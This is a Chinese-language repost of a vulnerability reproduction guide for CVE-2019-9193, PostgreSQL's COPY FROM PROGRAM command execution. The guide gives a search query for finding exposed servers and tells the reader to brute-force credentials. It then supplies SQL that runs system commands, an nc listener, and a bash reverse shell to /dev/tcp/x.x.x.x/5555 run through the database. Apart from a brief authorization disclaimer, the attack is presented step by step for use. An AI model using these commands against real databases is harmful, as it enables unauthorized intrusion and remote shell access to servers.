-CVE-2019-9193PostgreSQL 高权限命令执行漏洞

本文转载于公众号:融云攻防实验室,原文地址:

漏洞复现-CVE-2019-9193PostgreSQL 高权限命令执行漏洞

0x01 阅读须知

资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明

0x02 漏洞描述

PostgreSQL( 读作 Post-Gres-Q-L)是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS)。采用类似MIT的许可协议,允许开发人员做任何事情,包括在开源或闭源产品中商用,其源代码是免费提供的。由于9.3增加一个“COPY TO/FROM PROGRAM”功能,这个功能就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令。

图片[1]--CVE-2019-9193PostgreSQL 高权限命令执行漏洞-安全小天地

0x03 漏洞复现

漏洞影响:9.3-11.2

360QUAKE:service: “postgresql“

1.爆破PostgreSQL,得到账号密码

图片[2]--CVE-2019-9193PostgreSQL 高权限命令执行漏洞-安全小天地

2.连接,并输入如下命令,发现执行了命令并回显

DROP TABLE IF EXISTS cmd_exec;/*执行删除你想用来保存命令输出但是可能存在的表*/
CREATE TABLE cmd_exec(cmd_output text);/*创建用来保存命令输出的表*/
COPY cmd_exec FROM PROGRAM \'whoami\';/*通过 “COPY FROM PROGRAM”执行系统命令*/
SELECT * FROM cmd_exec;/*显示结果*/
图片[3]--CVE-2019-9193PostgreSQL 高权限命令执行漏洞-安全小天地

3.监听一个shell

nc.exe -lvvp 5555
图片[4]--CVE-2019-9193PostgreSQL 高权限命令执行漏洞-安全小天地

4.执行反弹shell命令

DROP TABLE IF EXISTS cmd_exec;/*执行删除你想用来保存命令输出但是可能存在的表*/
CREATE TABLE cmd_exec(cmd_output text);/*创建用来保存命令输出的表*/
COPY cmd_exec FROM PROGRAM \'bash -i >& /dev/tcp/x.x.x.x/5555 0>&1\';/*通过 “COPY FROM PROGRAM”执行系统命令*/
SELECT * FROM cmd_exec;/*显示结果*/

5.得到一个shell

图片[5]--CVE-2019-9193PostgreSQL 高权限命令执行漏洞-安全小天地
(注:要在正规授权情况下测试网站:日站不规范,亲人泪两行)
------本文已结束,感谢您的阅读------
THE END
喜欢就支持一下吧
点赞12 分享
评论 抢沙发
头像
善语结善缘,恶语伤人心
提交
头像

昵称

取消
昵称常用语 夸夸
夸夸
还有吗!没看够!
表情图片

    暂无评论内容